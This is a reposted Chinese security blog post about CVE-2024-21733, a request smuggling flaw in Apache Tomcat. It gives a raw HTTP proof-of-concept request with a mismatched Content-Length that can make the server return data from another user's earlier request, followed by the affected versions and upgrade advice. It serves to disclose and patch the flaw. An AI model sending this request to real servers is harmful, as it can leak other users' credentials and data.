首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

CVE-2024-21733 POC Apache Tomcat请求走私漏洞

文摘   2024-08-20 09:24   上海  

漏洞介绍

未完成的 POST 请求触发了可能包含的错误响应 来自另一个用户的先前请求的数据。在某些情况下,这可能会泄露敏感数据,例如明文凭据。

POC

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua:"Chromium";v="119","Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Linux"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/119.0.6045.159Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded

X

影响版本

影响版本

Apache Tomcat 9.0.0-M11  9.0.43
Apache Tomcat 8.5.7  8.5.63

修复建议:

缓解: 受影响版本的用户应应用以下方法之一 缓解措施:

  • • 升级到 Apache Tomcat 9.0.44 或更高版本

  • • 升级到 Apache Tomcat 8.5.64 或更高版本
Eonian Sharp
Eonian Sharp | 永恒之锋,专注APT框架、渗透测试攻击与防御的研究与开发,没有永恒的安全,但有永恒的正义之锋击破黑暗的不速之客。
 最新文章
钓鱼利器 | 红队免杀木马快速生成
Rust GUI 免杀生成器 - MaLoader
403绕过神器 - 4-ZERO-3
又一款 all in one 综合漏洞利用工具
"银狐"木马病毒变种,谨防微信链接分享!
漏洞预警 | 7-Zip代码执行漏洞CVE-2024-11477
Apache ZooKeeper Admin Server 身份验证绕过漏洞 CVE-2024-51504
高效挖掘SQL注入Burp插件 - DetSql
刻刀 | 高效资产管理系统 - TestNet
Linux 进程隐藏:中级隐藏篇
Rust加载器 - Coffee
Linux 进程隐藏:初级隐藏篇
恭喜中奖的师傅,请看这里
whoamifuck - Rust重构版
刻刀 | 若依定时任务SQL注入RCE一键利用工具 RuoYiExploitGUI_v1.0
免杀 | 利用管道通信传递参数
免杀 | 6种进程注入的方式
Windows10将不维护更新
msf生成windows的shellcode解析
密码学 | 分组密码
后渗透 | 信息收集工具
逆向 | vmp3.x 工具向脱壳
密码学 | 加解密算法学习
如何判断程序是用什么编程语言实现
逆向 | 反调试以及沙箱调试技巧
逆向 | 平坦化混淆
BurpSuite出现505 HTTP Version Not Supported的解决方法
漏洞预警 | Oracle WebLogic Server 存在反序列化漏洞
逆向工具系列 | x64dbg使用方法和技巧
逆向工具系列 | Kali逆向工具edb-debugger
逆向工具系列 | Cheat Engine(CE修改器)
逆向工具系列 | Binary Ninja4
EonianSharp · 永恒之锋安全
逆向工具系列 | Cutter
逆向工具系列 | jadx
2025 Rust 全员大会,庆祝Rust十周年!
逆向工具系列 | dnSpy
逆向工具系列 | OllyDBG
钓鱼钓不到,我还不知道鱼饵长啥样?
漏洞复现 | Windows TCP/IP IPv6 远程代码执行CVE-2024-38063
叮~ 你收到一份邮件通知,请查看...
刻刀-rust | 脉冲红队快速资产探测综合工具使用指南
【送黑悟空】 对目前安全工具的一个思考-选择使用rust破局
逆向工具系列 | Windbg
基础速查 | 敏感文件和目录
CVE-2024-21733 POC Apache Tomcat请求走私漏洞
逆向工具系列 | x64dbg
漏洞预警 | Windows TCP/IP 远程代码执行CVE-2024-38063
逆向工具系列 | GNU Debugger
root都无法修改文件?
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉